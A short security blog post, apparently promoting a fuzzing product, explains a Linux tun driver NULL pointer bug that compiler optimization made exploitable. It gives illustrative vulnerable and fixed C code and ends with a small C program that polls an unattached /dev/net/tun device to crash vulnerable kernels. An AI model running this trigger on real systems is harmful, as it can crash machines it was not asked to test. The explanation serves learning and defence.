When source code audit fails
A NULL pointer dereference vulnerability has been discovered in the tun driver source of the Linux kernel that appears “immune” when the code is audited, yet is vulnerable once GCC has applied its code optimizations.
The vulnerability allows executing arbitrary code and gaining root access.
An exploit has been released proving that the vulnerability is not just “theoretically” there, but can actually be exploited.
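Why the audited source reads as safe while the compiled kernel is not, as an added illustration modelled on the kernel's tun_chr_poll() (a user-space stand-in with constructed structs, not the page's or the kernel's code): the check for a NULL tun pointer sits after the first read through that pointer, so the compiler is entitled to drop it.

```c
#include <stddef.h>
#include <poll.h>

/* Constructed stand-ins for the kernel structures (not kernel code). */
struct sock { int wmem_alloc; int sndbuf; };
struct tun_struct { struct sock *sk; };

/* Vulnerable ordering: tun->sk is read BEFORE tun is tested for NULL.
 * To an auditor the "if (!tun)" looks like it guards the code below, but
 * tun was already dereferenced, so GCC at -O2 may treat it as provably
 * non-NULL and delete the check (the kernel build later added
 * -fno-delete-null-pointer-checks to prevent exactly this). */
unsigned int vuln_poll(struct tun_struct *tun)
{
    struct sock *sk = tun->sk;       /* dereference first ... */
    unsigned int mask = 0;
    if (!tun)                        /* ... check second: optimized away */
        return POLLERR;
    if (sk->wmem_alloc < sk->sndbuf) /* simplified sock_writeable() */
        mask |= POLLOUT;
    return mask;
}

/* Corrected ordering: test the pointer before anything reads through it,
 * so no earlier dereference can tell the compiler that tun is non-NULL. */
unsigned int fixed_poll(struct tun_struct *tun)
{
    struct sock *sk;
    unsigned int mask = 0;
    if (!tun)
        return POLLERR;
    sk = tun->sk;
    if (sk->wmem_alloc < sk->sndbuf)
        mask |= POLLOUT;
    return mask;
}

/* Helpers with constructed data: an fd opened but never attached (tun is
 * still NULL because TUNSETIFF was never issued), and an attached one. */
unsigned int poll_unattached_fixed(void)
{
    return fixed_poll(NULL);         /* POLLERR, never a NULL access */
}
unsigned int poll_attached(int use_fixed)
{
    struct sock s = { 0, 1 };
    struct tun_struct t = { &s };
    return use_fixed ? fixed_poll(&t) : vuln_poll(&t);
}
```

Compiling vuln_poll at -O2 and inspecting the assembly shows the comparison against NULL gone; fixed_poll keeps it at every optimization level.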
Need we say Black Box Fuzzing? An API fuzzer such as beSTORM would have easily caught this: beSTORM can be told to open the /dev/net/tun driver and write data directly to it, and one of the first tests it will perform is the “old” nothing (NULL) data transfer.
BTW: If you want to test the vulnerability on your kernel, here is a code snippet (opening the device without attaching it via TUNSETIFF, then polling it):

#include <fcntl.h>
#include <poll.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    struct pollfd pfd;
    int fd = open("/dev/net/tun", O_RDWR); /* opened, never attached */
    if (fd < 0) { perror("open /dev/net/tun"); return 1; }
    pfd.fd = fd;
    pfd.events = POLLIN | POLLOUT;
    poll(&pfd, 1, 0); /* on a vulnerable kernel this dereferences NULL and oopses */
    return close(fd);
}